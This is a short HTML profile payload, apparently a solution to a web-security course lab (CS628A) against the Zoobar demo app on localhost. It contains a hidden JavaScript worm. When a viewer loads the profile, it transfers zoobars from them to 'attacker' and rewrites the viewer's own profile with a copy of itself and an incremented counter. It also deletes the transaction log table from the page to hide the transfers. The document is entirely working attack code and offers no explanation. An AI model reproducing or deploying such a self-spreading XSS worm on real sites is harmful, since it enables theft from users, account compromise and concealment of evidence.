I Love CS628A!
<div id="profileupdate" style="display : none;">
    <script>
        var zoobar = 1;
        var req1 = new XMLHttpRequest();
        req1.open("POST", "http://localhost:8080/zoobar/index.cgi/transfer");
        req1.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        req1.send("zoobars="+zoobar+"&recipient=attacker&submission=Send");
        var newhtml = document.getElementById("profileupdate").innerHTML;
        var innerhtml = 'I Love CS628A!<div id="profileupdate" style="display : none;">' + newhtml + '</div><span id="zoobars" class="10"></span>';
        innerhtml = innerhtml.replace(/zoobar = (\d+)+/g, function(substr, value) {
                        var tmp = parseInt(value)+1;
                        return "zoobar = " + tmp;
                    });
        var req2 = new XMLHttpRequest();
        req2.open("POST", "http://localhost:8080/zoobar/index.cgi");
        req2.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        req2.send("profile_update=" + encodeURIComponent(innerhtml) + "&profile_submit=Save");
        window.onload = function(){ document.getElementsByClassName("log")[0].getElementsByTagName("tbody")[0].remove();}
    </script>
</div>
<span id="zoobars" class="10"></span>
